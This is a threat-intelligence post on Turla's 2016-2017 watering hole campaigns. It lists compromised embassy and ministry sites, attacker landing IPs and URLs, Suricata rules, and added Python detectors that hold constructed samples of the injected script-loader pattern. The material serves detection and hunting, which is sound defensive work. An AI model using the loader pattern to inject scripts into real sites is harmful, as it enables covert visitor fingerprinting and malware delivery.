Turla Watering Hole Campaigns 2016/2017

A common TTP of the Turla APT group has been based around watering hole attacks. In late 2016, we began observing what is now called the “Clicky” watering hole campaign unfold across the globe, in addition to a similar campaign I’ll refer to as the “img” campaign. With the kickoff of the 401TRG, we have decided it is worth sharing this information to complement the public reporting by our colleagues at ESET. This post will focus on the watering holes, as opposed to post-compromise activity.

For this campaign, Turla has been compromising multiple domains which attract visitors of interest to the group. The domains are compromised via CMS exploits, then modified with a script added to the homepage of the domain, which forwards legitimate visitors to a secondary domain that is completely controlled by the attackers. The script (detailed below) forces at least one HTTP GET request to the secondary domain for either a benign file (PHP or JS) or a page that does not exist (PHP, JS, HTML). The purpose of this single GET request from the watering hole domain is to let the group collect the visitor's public IP address, along with the basic host information carried in the HTTP headers (the User-Agent), effectively fingerprinting the visitors. If the visitor is within a targeted IP range, the attack continues by serving the visitor an additional profiling script, also noted by ESET.

While the group's TTPs are constantly evolving, this is believed to be a method for the attacker to filter, via the fingerprint, for the targets of interest that fit the group's agenda. The group only delivers malware to those it has selected as targets based on the fingerprint. Using the information gathered through this fingerprinting, the group is able to deliver malware likely to be highly effective on the victim host.

Technical Details

The group has injected various scripts on the compromised domains. Below are samples of the scripts placed either directly on the home page, or within other referenced files loaded by the home page. We have also observed cases where only specific pages of the original compromised domains (the watering hole) contain the injected script. This allowed us to gain additional insight into the target profile of Turla.

Figure 1 (screenshot not reproduced): One of the first scripts observed. Note the typo // when concatenating var a and var b. (Beautified for readability)

Figure 2 (screenshot not reproduced): Updated script, with the concatenation typo corrected and a further iteration on the misdirection attempt. (Beautified for readability)

Figure 3 (screenshot not reproduced): Modified script for a new secondary landing, which also uses a protocol-relative double forward slash (//) instead of an explicit http://. (Beautified for readability)

Figure 4 (screenshot not reproduced): Separate injected image reference to a PHP file. Likely a different campaign reusing attacker infrastructure, the “Img” campaign.

The destination PHP and JS files have been observed as either nonexistent, or replaced with a benign file during non-target visits. For example, one benign file observed was a simple copy of the MD5-generating code from www.myersdaily.org/joseph/javascript/.

Figure 5 (screenshot not reproduced): HTTP GET request to the secondary landing, originating from the watering hole domain.

Indicators

Compromised Domains (Confirmed Watering Hole Victims)

| Domain | Description |
| --- | --- |
| au.int | African Union; parent organizations: Organisation of African Unity, African Economic Community |
| mfa.uz | The Ministry of Foreign Affairs of the Republic of Uzbekistan |
| mfa.gov.kg | The Ministry of Foreign Affairs of the Kyrgyz Republic |
| mfa.gov.md | Ministry of Foreign Affairs and European Integration of Moldova |
| capcooperation.org | Resource Center for International Cooperation in Aquitaine |
| namibianembassyusa.org | Embassy of Namibia, Washington, D.C. |
| zambiaembassy.org | Embassy of Zambia, Washington, D.C. |
| iraqiembassy.us | Embassy of Iraq, Washington, D.C. |
| jordanembassyus.org | Embassy of Jordan, Washington, D.C. |
| embassypro.com | NA |
| mischendorf.at | Mischendorf, a town in the district of Oberwart in the Austrian state of Burgenland |
| jse.org | The Socialist Youth of Spain |
| embassyofindonesia.org | Embassy of the Republic of Indonesia, Washington, D.C. |
| bewusstkaufen.at | Austrian Ministry of the Environment |
| sai.gov.ua | Office of Road Safety emergency DPD Ukraine |
| avsa.org | African Violet Society of America |
| osv.or.at | Austrian Swimming Association |
| mareeg.com | Somalia World News Organization |
| vfreiheitliche.at | Provincial party of the Freedom Party of Austria |
| afghanembassy.tj | Embassy of Afghanistan in Dushanbe, Tajikistan |
| barbara-rosenkranz.at | An Austrian politician for the Freedom Party of Austria |
| bioresurse.ro | National Institute of Research and Development for Food Bioresources, Romania |

Suspicious Relationship (Possible Watering Hole Victims)

| Domain | Description |
| --- | --- |
| frenchamerican.org | The French-American Foundation, a non-governmental organization |
| nfi.org.in | National Foundation for India |
| russianembassy.org | Embassy of Russia in Washington, D.C. |

Landing Infrastructure

| Landing IP (most recent) | Landing Domain | Landing URL(s) |
| --- | --- | --- |
| 98.143.148.72 | nbcpost[.]com | rss.nbcpost[.]com/news/today/content.php |
| 107.155.99.133 | travelclothes[.]org | static.travelclothes[.]org/main.js |
| 58.158.177.102 | epsoncorp[.]com | drivers.epsoncorp[.]com/plugin/analytics/counter.js |
| 185.68.16.62 | msgcollection[.]com | msgcollection[.]com/templates/nivoslider/loading.php |
| 58.158.177.102 | mentalhealthcheck[.]net | mentalhealthcheck[.]net/update/check.php, mentalhealthcheck[.]net/update/counter.js, mentalhealthcheck[.]net//update/counter.js |
| 209.99.64.25 | alessandrosl[.]com | alessandrosl[.]com/core/modules/mailer/mailer.php |
| 74.208.70.127 | loveandlight.aws3[.]net | loveandlight.aws3[.]net/wp-includes/theme-compat/akismet.php |

Suricata IDS Rules

  • alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"401TRG - Possible Turla APT SWC Redirect - Clicky Campaign M1"; flow:established,from_server; file_data; content:"clicky_site_ids"; fast_pattern; content:"document.createElement"; nocase; distance:0; within:100; content:"/counter.js"; distance:0; content:"text/javascript"; distance:0; content:".appendChild"; distance:0; content:"|3b|"; pcre:"/^\s*[^\r\n]+\.\s*src\s*=\s*[\x22\x27]\s*[a-z]+\.getclicky\.com\/js\s*[\x22\x27]\s*\x3b/Rsi"; reference:url,https://401trg.pw/turla-watering-hole-campaigns-2016-2017/; sid:70045804; rev:1;)

  • alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"401TRG - Possible Turla APT SWC Redirect - Clicky Campaign M2"; flow:established,from_server; file_data; content:"document.createElement"; nocase; fast_pattern; content:"var"; distance:0; within:50; content:"text/javascript"; distance:0; content:".appendChild"; distance:0; content:"var"; pcre:"/^\s*(?P<vara>[A-Za-z0-9-]{1,20})\s*=\s*[\x22\x27]\s*http\x3a\x2f\x2f[^\r\n]+[\x22\x27]\s*\x3b\s*var\s*(?P<varb>[A-Za-z0-9-]{1,20})\s*=\s*[\x22\x27]\s*\/[^\r\n]+[\x22\x27]\s*\x3b\s*.+\.\s*src\s*=\s*(?P=vara)\s*\.\s*concat\s*\(\s*(?P=varb)\s*\)\s*\x3b/Rsi"; reference:url,https://401trg.pw/turla-watering-hole-campaigns-2016-2017/; sid:70045805; rev:1;)

If you would like to automate the intake of these indicators, please see our GitHub Detections repo.
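The two rules above only fire on live traffic. For checking saved page bodies offline (crawler output, a cached copy of a site you administer), here is an added Python port of the same two patterns; it is example code written for this page, not a 401TRG tool. It goes slightly beyond the rules: it also accepts the protocol-relative `//` form of var a described for Figure 3, and it rebuilds the loader URL, which exposes the `//` typo from Figure 1. The page bodies it scans are constructed for the example and use the reserved example.invalid domain; they are not captures from the campaign.

```python
"""Added example (not from the 401TRG post): a Python port of the two
Suricata rules above, for scanning saved page bodies offline.

M1: the "Clicky" misdirection, a created <script> element that references a
    /counter.js file while an src assignment points at *.getclicky.com/js.
M2: var a = "http://..."; var b = "/..."; element.src = a.concat(b);
    Beyond the rule, the port also accepts the protocol-relative "//" form of
    var a (Figure 3) and rebuilds the loader URL (exposing the Figure 1 typo).
The page bodies below are constructed for this example and use the reserved
example.invalid domain; they are not captures from the campaign.
"""
import re

# M2: two string variables concatenated into a script src.  The named groups
# mirror the Suricata rule (vara/varb); the back-references require that the
# same two variables are the ones passed to concat().  Unlike the IDS rule,
# the relative ordering of createElement/appendChild is not enforced here.
M2_RE = re.compile(
    r"var\s+(?P<vara>[A-Za-z0-9_-]{1,20})\s*=\s*[\"']\s*"
    r"(?P<aval>(?:https?:)?//[^\r\n\"']+)[\"']\s*;"
    r"\s*var\s+(?P<varb>[A-Za-z0-9_-]{1,20})\s*=\s*[\"']\s*"
    r"(?P<bval>/[^\r\n\"']+)[\"']\s*;"
    r".*?\.\s*src\s*=\s*(?P=vara)\s*\.\s*concat\s*\(\s*(?P=varb)\s*\)\s*;",
    re.IGNORECASE | re.DOTALL,
)

# M1: the src assignment that makes the loader look like the Clicky tracker.
M1_SRC_RE = re.compile(
    r"\.\s*src\s*=\s*[\"']\s*[a-z]+\.getclicky\.com/js\s*[\"']\s*;",
    re.IGNORECASE,
)
# The content matches the M1 rule requires before its pcre check.
M1_MARKERS = ("clicky_site_ids", "document.createElement", "/counter.js",
              "text/javascript", ".appendChild")


def scan_page(body: str) -> dict:
    """Return {"rules": [matched rule names], "loader_url": str or None}."""
    result = {"rules": [], "loader_url": None}
    lowered = body.lower()
    if all(m.lower() in lowered for m in M1_MARKERS) and M1_SRC_RE.search(body):
        result["rules"].append("M1")
    m = M2_RE.search(body)
    if m:
        result["rules"].append("M2")
        # Rebuild what the browser would request; a trailing "/" in var a plus
        # a leading "/" in var b yields the "//" seen in the Figure 1 typo.
        result["loader_url"] = m.group("aval") + m.group("bval")
    return result


# Constructed sample: the a.concat(b) loader shape (M2), including the typo.
SAMPLE_M2 = """<script type="text/javascript">
var a = "http://cdn.example.invalid/";
var b = "/update/counter.js";
var s = document.createElement("script");
s.type = "text/javascript";
s.src = a.concat(b);
document.head.appendChild(s);
</script>"""

# Constructed sample: the Clicky-lookalike loader shape (M1).
SAMPLE_M1 = """<script type="text/javascript">
var clicky_site_ids = clicky_site_ids || [];
var s = document.createElement("script");
s.type = "text/javascript";
s.src = "//tracker.example.invalid/update/counter.js";
document.head.appendChild(s);
s.src = "static.getclicky.com/js";
</script>"""

# Constructed sample: an ordinary Clicky tracker snippet, which must not fire.
SAMPLE_BENIGN = """<script type="text/javascript">
var clicky_site_ids = clicky_site_ids || [];
clicky_site_ids.push(12345);
(function () {
  var s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "//static.getclicky.com/js";
  document.getElementsByTagName("head")[0].appendChild(s);
})();
</script>"""

if __name__ == "__main__":
    for name, page in (("M2", SAMPLE_M2), ("M1", SAMPLE_M1), ("benign", SAMPLE_BENIGN)):
        print(name, scan_page(page))
```

The benign sample matters as much as the two positive ones: a legitimate Clicky snippet contains `clicky_site_ids`, `document.createElement` and `appendChild`, so the `/counter.js` reference and the bare `host.getclicky.com/js` string (no scheme, no `//`) are what separate the injected loader from the real tracker.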

Basic Actor Information

The following information has been collected from shared reports and OSINT. For additional details on other activity from this group, please see the ‘additional resources’ section below.

Associated Group Names:

  • Turla - Kaspersky Lab
  • Krypton - Microsoft
  • Venomous Bear - Crowdstrike

Known Targets of Interest:

Government, NGOs, telecommunications, energy, and education. The group shows special interest in Europe, Australia, and the United States. The group's agenda is potentially focused on collecting intellectual property and political information.

TTPs:

Strategic web compromises via CMS exploits to build long-standing watering hole campaigns. In addition, the group is known to use satellite ISPs within its attack infrastructure, and spear phishing tactics. Publicly tied to the use of malware called Turla/Uroburos/Snake and WipBot/Tavdig, to name a few.

Recommended Actions

First, understand the tactics and the IR processes behind identifying such attacks. For organizations or individuals who were not affected by this campaign, the scenario can be used as a simulated attack to evaluate your detection capabilities, as well as your response approach and general understanding. While these tactics are highly targeted and rarely encountered in the wild, this can be a great way to evaluate security posture.

If applicable, use the provided indicators in the security products within your network. These indicators may be helpful in web gateway, firewall, or endpoint products. Please note that not all of these domains or IP addresses are used exclusively in this campaign; some may be shared infrastructure with legitimate uses, or generally legitimate domains. Triggering on them is not confirmation of activity or of this campaign. Instead, given the age of the activity shared in this post, use them in combination as hunting triggers if you have a longer data retention history.
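What "in combination" looks like in practice, as an added Python example written for this page (not a 401TRG tool): a hunt over web-proxy logs that rates a request HIGH only when it reaches one of the landing domains and carries a Referer from one of the confirmed watering hole domains, the chain shown in Figure 5. A request for an exact landing URL without that Referer rates MEDIUM, and a bare contact with a landing domain rates LOW, since some of that infrastructure may be shared. The log lines are constructed, and the tab-separated field layout is an assumption, not any product's real format; the watering hole set is a subset of the table above.

```python
"""Added example (not from the 401TRG post): hunting for the watering-hole
redirect chain in web-proxy logs, using the post's indicators in combination.

HIGH   = landing domain reached AND Referer from a compromised watering hole
MEDIUM = an exact landing URL requested, but without that Referer
LOW    = landing domain contacted only (shared infrastructure possible)
The log lines are constructed for this example, and the field layout (tab
separated timestamp, client IP, method, URL, Referer, User-Agent) is an
assumption rather than any product's real format.
"""
from urllib.parse import urlsplit

# Indicators copied from the post's tables, with the defanging brackets removed.
LANDING_DOMAINS = {
    "nbcpost.com", "travelclothes.org", "epsoncorp.com", "msgcollection.com",
    "mentalhealthcheck.net", "alessandrosl.com", "loveandlight.aws3.net",
}
LANDING_PATHS = {
    "/news/today/content.php", "/main.js", "/plugin/analytics/counter.js",
    "/templates/nivoslider/loading.php", "/update/check.php",
    "/update/counter.js", "//update/counter.js",
    "/core/modules/mailer/mailer.php", "/wp-includes/theme-compat/akismet.php",
}
# A subset of the confirmed watering hole domains; extend from the table above.
WATERING_HOLES = {
    "au.int", "mfa.uz", "mfa.gov.kg", "mfa.gov.md", "namibianembassyusa.org",
    "zambiaembassy.org", "iraqiembassy.us", "jordanembassyus.org",
    "embassyofindonesia.org", "afghanembassy.tj", "bioresurse.ro",
}


def indicator_for(host: str):
    """Return the indicator domain that matches host, or None.
    Landing hosts in the post carry subdomains (rss., static., drivers.),
    so a suffix match is used instead of an exact one."""
    host = host.lower().rstrip(".")
    for dom in LANDING_DOMAINS | WATERING_HOLES:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


def classify(line: str):
    """Return (severity, reason) for one log line, or None if nothing matched."""
    _ts, client, _method, url, referer, _ua = line.rstrip("\n").split("\t")
    req = urlsplit(url)
    dest = indicator_for(req.hostname or "")
    if dest not in LANDING_DOMAINS:
        return None
    ref_dom = None
    if referer != "-":
        ref_dom = indicator_for(urlsplit(referer).hostname or "")
    if ref_dom in WATERING_HOLES:
        return ("HIGH", f"{client} fetched {dest}{req.path} with Referer from watering hole {ref_dom}")
    if req.path in LANDING_PATHS:
        return ("MEDIUM", f"{client} fetched known landing URL {dest}{req.path}")
    return ("LOW", f"{client} contacted landing domain {dest}; shared infrastructure possible")


def hunt(lines):
    """Run classify over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit is not None]


# Constructed proxy log: a watering hole visit followed by the landing fetch,
# one landing URL without the telltale Referer, one bare landing domain hit.
SAMPLE_LOG = [
    "2017-01-10T09:12:01Z\t10.0.0.15\tGET\thttp://mfa.gov.kg/\t-\tMozilla/5.0",
    "2017-01-10T09:12:02Z\t10.0.0.15\tGET\thttp://mentalhealthcheck.net//update/counter.js\thttp://mfa.gov.kg/\tMozilla/5.0",
    "2017-01-10T10:05:44Z\t10.0.0.22\tGET\thttp://static.travelclothes.org/main.js\thttp://www.example.invalid/blog\tMozilla/5.0",
    "2017-01-10T11:30:00Z\t10.0.0.31\tGET\thttp://nbcpost.com/\t-\tMozilla/5.0",
    "2017-01-10T11:31:00Z\t10.0.0.31\tGET\thttps://www.example.invalid/\t-\tMozilla/5.0",
]

if __name__ == "__main__":
    for severity, reason in hunt(SAMPLE_LOG):
        print(severity, reason)
```

Note that the URL path is compared verbatim, so the `//update/counter.js` variant (the Figure 1 typo) is kept as its own entry rather than normalised away; that double slash is itself a useful discriminator when hunting.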

Additional Resources on this Campaign and Turla